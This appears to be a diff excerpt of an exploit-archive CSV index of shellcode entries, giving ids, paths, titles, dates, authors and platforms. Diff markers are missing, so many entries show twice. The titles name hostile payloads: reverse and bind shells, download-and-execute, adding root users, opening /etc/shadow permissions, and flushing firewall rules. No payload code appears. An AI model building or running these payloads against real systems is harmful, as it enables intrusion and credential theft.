34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
@ -472,15 +473,15 @@ id,file,description,date,author,type,platform
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
@ -488,69 +489,69 @@ id,file,description,date,author,type,platform
36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
36779,shellcodes/windows_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36780,shellcodes/windows_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86
37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86
37285,shellcodes/linux_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86
37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86
37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86
37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37664,shellcodes/windows_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
37758,shellcodes/windows_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64
39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
@ -566,14 +567,14 @@ id,file,description,date,author,type,platform
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86
@ -583,7 +584,7 @@ id,file,description,date,author,type,platform
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
@ -610,18 +611,69 @@ id,file,description,date,author,type,platform
43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64
43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64
43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86
43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc
43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc
43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc
43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,osx_ppc
43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc
43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx
43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86
43627,shellcodes/bsd_x86/43627.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43628,shellcodes/bsd_x86/43628.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43629,shellcodes/bsd_x86/43629.c,"BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43630,shellcodes/linux_x86/43630.c,"Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)",2009-01-01,dev0id,shellcode,linux_x86
43631,shellcodes/linux_x86/43631.c,"Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,linux_x86
43621,shellcodes/solaris_sparc/43621.c,"Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode",2009-01-01,"Claes M. Nyberg",shellcode,solaris_sparc
43622,shellcodes/solaris_sparc/43622.asm,"Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,solaris_sparc
43623,shellcodes/solaris_sparc/43623.asm,"Solaris/SPARC - Bind TCP Shell Shellcode",2009-01-01,vlad902,shellcode,solaris_sparc
43624,shellcodes/solaris_x86/43624.asm,"Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes)",2009-01-01,"John Babio",shellcode,solaris_x86
43625,shellcodes/solaris_x86/43625.c,"Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,shellcode.com.ar,shellcode,solaris_x86
43632,shellcodes/bsd_x86/43632.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43634,shellcodes/openbsd_x86/43634.c,"OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,openbsd_x86
43635,shellcodes/bsd_x86/43635.c,"BSD/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43636,shellcodes/bsd_x86/43636.c,"BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes)",2009-01-01,dev0id,shellcode,bsd_x86
43637,shellcodes/linux_x86/43637.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes)",2009-01-01,dev0id,shellcode,linux_x86
43638,shellcodes/linux_x86/43638.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes)",2009-01-01,dev0id,shellcode,linux_x86
